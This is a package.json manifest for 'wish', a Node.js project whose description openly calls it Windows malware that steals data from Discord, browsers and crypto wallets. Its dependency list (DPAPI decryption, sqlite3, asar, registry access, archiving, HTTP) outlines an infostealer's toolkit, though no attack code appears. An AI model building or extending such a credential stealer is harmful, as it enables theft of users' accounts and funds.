{
    "name": "wish",
    "version": "1.0.0",
    "description": "Node.js malware for Windows that extracts user data from Discord, browsers, crypto wallets, and more, affecting all users on every disk.",
    "main": "index.js",
    "scripts": {
        "start": "node index.js",
        "rebuild": "npm rebuild",
        "install": "npm install -g node-gyp && npm install node-gyp"
    },
    "author": "k4itrun",
    "license": "MIT",
    "repository": {
        "type": "git",
        "url": "https://github.com/k4itrun/wish"
    },
    "bugs": {
        "url": "https://github.com/k4itrun/wish/issues"
    },
    "homepage": "https://github.com/k4itrun/wish#readme",
    "dependencies": {
        "@primno/dpapi": "^1.1.2",
        "archiver": "^7.0.1",
        "asar": "^3.2.0",
        "axios": "^1.7.3",
        "glob": "^11.0.0",
        "node-forge": "^1.3.1",
        "node-gyp": "^10.2.0",
        "sqlite3": "^5.1.6",
        "winreg": "^1.2.5"
    }
}
